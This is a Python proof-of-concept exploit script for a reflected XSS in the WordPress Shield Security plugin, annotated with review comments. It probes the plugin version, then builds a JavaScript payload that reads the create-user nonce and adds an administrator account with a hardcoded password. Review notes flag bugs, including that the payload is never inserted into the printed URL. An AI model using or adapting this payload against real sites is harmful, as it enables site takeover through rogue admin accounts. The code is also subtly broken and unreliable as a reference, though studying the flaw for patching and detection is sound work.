import sys
import urllib.parse
import requests
from bs4 import BeautifulSoup  # NOTE(review): imported but never used in this file

# Proof-of-concept script for the reflected XSS described in the banner below
# (CVE-2024-7313, Shield Security plugin for WordPress, per the banner text).
# Flow: banner -> argument check -> crude version probe of /wp-login.php ->
# interactive prompts -> print a URL under /wp-admin/admin.php. It performs no
# request other than the single GET in check_vulnerability(); the generated URL
# is only printed, never fetched.

# Color codes for terminal output (ANSI SGR escapes; `purple` is defined but unused)
red = '\033[91m'
green = '\033[92m'
yellow = '\033[93m'
blue = '\033[96m'
purple = '\033[95m'
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script
def print_banner() -> None:
    """Print the ASCII banner with the advisory summary to stdout."""
    # The banner is a plain f-string; the only substitutions are the color codes.
    print(f"""{red}
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _        _____ _____ _ _____ #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |      |___  |___ // |___ / #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#                                                                           #
#  Shield Security Plugin Vulnerability (CVE-2024-7313)                     #
#  Reflected XSS in WordPress Shield Security Plugin                        #
#  Versions Affected: < 20.0.6                                              #
#  Risk: High                                                               #
#  Discovered by: Wayne-Kerr                                                #
#  Published: August 7, 2024                                                #
#############################################################################
{reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used
def print_help() -> None:
    """Print the usage text to stdout.

    Called from the entry point whenever the argument count is not exactly one
    or the single argument is '-h'/'--help'.
    """
    # NOTE(review): the usage line names no positional argument, although the
    # entry point requires exactly one (the target URL).
    print(f"""{yellow}
Usage: python3 exploit.py

Example: python3 exploit.py http://example.com

Options:
  -h, --help    Show this help message and exit
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"
def format_target_url(target_url: str) -> str:
    """Return *target_url* unchanged if it has an http(s) scheme, else prefix "http://".

    No other normalisation is done: a trailing slash is kept as given, which
    later produces a double slash when "/wp-login.php" is appended.
    """
    if target_url.startswith("http://") or target_url.startswith("https://"):
        return target_url
    else:
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page
def check_vulnerability(target_url: str) -> bool:
    """Fetch /wp-login.php once and decide from a `ver=` query string in the page.

    Returns True only when the page is served with HTTP 200, the extracted
    version parses as three integers, and it compares below 20.0.6. Every
    failure path (non-200, unparsable version, network error) prints a message
    and returns False; nothing is raised to the caller.

    NOTE(review): the version is taken from the LAST `ver=` occurrence in the
    HTML, i.e. whichever enqueued asset happens to come last, not necessarily
    the Shield plugin's own asset. The result is therefore an unreliable
    fingerprint in both directions (false positives and false negatives).
    """
    try:
        # NOTE(review): no `timeout=` is passed, so an unresponsive host blocks
        # indefinitely; the single request is the script's only network traffic.
        response = requests.get(f"{target_url}/wp-login.php")
        if response.status_code == 200:
            # Try to extract version information from the response
            # `split("ver=")[-1]` is the whole body when "ver=" is absent; the
            # int() conversions below then raise and the broad except returns False.
            version_info = response.text.split("ver=")[-1].split("\"")[0]
            version = version_info.split(".")
            major_version = int(version[0])
            minor_version = int(version[1])
            # A version string may carry further query parameters ("6.6.1&foo");
            # only the part before '&' is parsed.
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6
            # Vulnerable iff major < 20, or exactly 20.0.x with x < 6.
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")
                return True
            else:
                print(f"{yellow}Version not vulnerable.{reset}")
                return False
        else:
            print(f"{red}Failed to retrieve the version information.{reset}")
            return False
    # Deliberately broad: IndexError/ValueError from parsing and any requests
    # exception are all reported the same way and mapped to "not vulnerable".
    except Exception as e:
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")
        return False

# Generate the XSS payload URL that exploits the vulnerability
def generate_xss_payload(target_url: str, username: str, email: str, first_name: str, last_name: str) -> str:
    """Build a JavaScript snippet from the prompted values and return an admin.php URL.

    The snippet, if it ever executed in a logged-in administrator's browser,
    would read the create-user nonce from /wp-admin/user-new.php and submit a
    new `administrator` account with a fixed password, then redirect to the
    Shield dashboard. Only `email` and the password are URL-quoted; `username`,
    `first_name` and `last_name` are interpolated as typed.

    Detection-relevant constants on the page: the created account always has
    `url=test` and the same hardcoded password, and the redirect target is
    `admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview`.

    NOTE(review): `payload` is never referenced after it is built; the URL
    returned quotes an empty string, so its `nav_sub` parameter is empty as
    written.
    """
    # Hardcoded password for the new admin account to be created
    # (duplicated verbatim in the entry point for display; the two copies are
    # not shared).
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack
    # Doubled braces `{{`/`}}` are literal JS braces after str.format(); the
    # single-brace names are the format fields filled in below.
    payload_template = (
        "var xhrNonce = new XMLHttpRequest(); "
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "
        "xhrNonce.onload = function() {{ "
        "if (xhrNonce.status === 200) {{ "
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "
        "var xhr = new XMLHttpRequest(); "
        "xhr.open('POST', '/wp-admin/user-new.php', true); "
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "
        "xhr.setRequestHeader('Origin', '{target}'); "
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"
        "&user_login={username}&email={email}"
        "&first_name={first_name}&last_name={last_name}&url=test"
        "&pass1={password}&pass2={password}&role=administrator"
        "&createuser=Add+New+User'; "
        "xhr.send(params); "
        "xhr.onload = function() {{ "
        "if (xhr.status == 200) {{ "
        "console.log('Admin user created successfully'); "
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "
        "}}; "
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "
        "xhrNonce.send();"
    )

    # Formatting the payload with the provided details
    payload = payload_template.format(
        target=target_url,
        username=username,
        email=urllib.parse.quote(email),
        first_name=first_name,
        last_name=last_name,
        password=urllib.parse.quote(hardcoded_password)
    )

    # URL encode the payload and generate the full URL for the XSS attack
    # As written this quotes an empty f-string, not `payload`.
    encoded_payload = urllib.parse.quote(f"")
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":
    # Entry point. Exit codes: 0 after printing help, 1 on a negative version
    # check, Ctrl-C, or any other exception; otherwise the script ends normally
    # after printing the generated URL.
    try:
        # Print the banner
        print_banner()

        # Check for help menu flag and print help if necessary
        # Any argument count other than one is treated like --help.
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:
            print_help()
            # SystemExit derives from BaseException, so the `except Exception`
            # below does not intercept it.
            sys.exit(0)

        # Get the target URL from the command-line argument
        raw_target_url = sys.argv[1]
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable
        if not check_vulnerability(target_url):
            sys.exit(1)

        # Get user input for the new admin account details
        # Values are passed through unvalidated to generate_xss_payload().
        username = input(f"{blue}Enter username: {reset}")
        email = input(f"{blue}Enter email: {reset}")
        first_name = input(f"{blue}Enter first name: {reset}")
        last_name = input(f"{blue}Enter last name: {reset}")

        # Display the hardcoded password
        # Local copy for display only; generate_xss_payload() has its own.
        hardcoded_password = "HaxorStrongAFPassword123!!"
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption
    except KeyboardInterrupt:
        print(f"\n{red}Script interrupted by user.{reset}")
        sys.exit(1)

    # Catch any other exceptions and display an error message
    except Exception as e:
        print(f"{red}An error occurred: {e}{reset}")
        sys.exit(1)